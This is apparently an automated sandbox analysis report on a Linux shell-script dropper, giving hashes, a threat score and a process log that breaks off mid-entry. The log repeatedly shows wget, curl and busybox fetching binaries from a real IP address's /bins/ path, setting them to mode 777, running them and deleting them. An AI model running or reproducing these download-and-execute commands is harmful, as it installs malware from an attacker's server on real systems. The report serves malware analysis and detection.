bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb

Analysis

max time kernel
32s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
21-11-2024 08:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
Size

10KB
MD5

7f9d3db559611740d40b8bccb98f2049
SHA1

28310a0e460821cd5a5feac8b12caa9888a8d099
SHA256

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
SHA512

ece04554d410979552af51e89a048b680fa4deb2af109261066b0df055cd57a8c32e7600cc3e35f5b35a6795602775103c9ae7c4ad2cf54a8bc4e36a6eeca932
SSDEEP

192:WhV/N+6upNj0sUD8//x89a3lR9lC8gwS8gBhV/N+6KpNj0sL//x89an:6mpNj0sUDslR9M8gL8gbCpNj0sZ

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1645	chmod
1519	chmod
1531	chmod
1555	chmod
1579	chmod
1651	chmod
1597	chmod
1603	chmod
1677	chmod
1683	chmod
1549	chmod
1585	chmod
1621	chmod
1663	chmod
1537	chmod
1561	chmod
1639	chmod
1525	chmod
1591	chmod
1633	chmod
1657	chmod
1567	chmod
1627	chmod
1671	chmod
1543	chmod
1573	chmod
1609	chmod
1615	chmod

Executes dropped EXE 28 IoCs

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	curl
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	curl
File opened for modification	/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	curl
File opened for modification	/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	curl
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	curl

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
1⤵
PID:1511
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:1512
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1513
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Writes file to tmp directory
  PID:1517
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1518
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:1520
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1521
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1522
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1524
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:1526
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1527
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1528
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1530
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:1532
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1533
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1534
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1536
- /bin/chmod
  chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  ./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Executes dropped EXE
  PID:1538
- /bin/rm
  rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1539
- /usr/bin/wget
  wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1540
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1542
- /bin/chmod
  chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  ./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/rm
  rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1546
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1548
- /bin/chmod
  chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  ./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Executes dropped EXE
  PID:1550
- /bin/rm
  rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1552
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1554
- /bin/chmod
  chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  ./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Executes dropped EXE
  PID:1556
- /bin/rm
  rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1557
- /usr/bin/wget
  wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1558
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1560
- /bin/chmod
  chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  ./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Executes dropped EXE
  PID:1562
- /bin/rm
  rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1563
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1564
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1566
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:1568
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1569
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1570
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1572
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:1574
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1575
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1576
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Writes file to tmp directory
  PID:1577
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1578
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:1579
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:1580
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1581
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1582
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Writes file to tmp directory
  PID:1583
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1584
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:1585
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:1586
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1587
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1588
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Writes file to tmp directory
  PID:1589
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1590
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:1591
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:1592
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1593
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1594
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1596
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:1598
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1599
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1600
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1602
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:1603
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:1604
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:1605
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1606
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Writes file to tmp directory
  PID:1607
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1608
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:1609
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:1610
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:1611
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1612
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Writes file to tmp directory
  PID:1613
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1614
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:1615
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:1616
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:1617
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1618
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Writes file to tmp directory
  PID:1619
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1620
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:1621
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:1622
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:1623
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1624
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Writes file to tmp directory
  PID:1625
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1626
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:1627
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:1628
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:1629
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1630
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Writes file to tmp directory
  PID:1631
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1632
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:1633
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:1634
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:1635
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1636
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Writes file to tmp directory
  PID:1637
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1638
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:1639
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:1640
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:1641
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1642
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Writes file to tmp directory
  PID:1643
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1644
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:1645
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:1646
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:1647
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1648
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Writes file to tmp directory
  PID:1649
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1650
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:1651
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:1652
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:1653
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1654
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Writes file to tmp directory
  PID:1655
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1656
- /bin/chmod
  chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - File and Directory Permissions Modification
  PID:1657
- /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  ./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Executes dropped EXE
  PID:1658
- /bin/rm
  rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:1659
- /usr/bin/wget
  wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1660
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Writes file to tmp directory
  PID:1661
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1662
- /bin/chmod
  chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - File and Directory Permissions Modification
  PID:1663
- /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  ./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Executes dropped EXE
  PID:1664
- /bin/rm
  rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:1665
- /usr/bin/wget
  wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1666
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Writes file to tmp directory
  PID:1669
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1670
- /bin/chmod
  chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - File and Directory Permissions Modification
  PID:1671
- /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  ./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Executes dropped EXE
  PID:1672
- /bin/rm
  rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:1673
- /usr/bin/wget
  wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1674
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Writes file to tmp directory
  PID:1675
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1676
- /bin/chmod
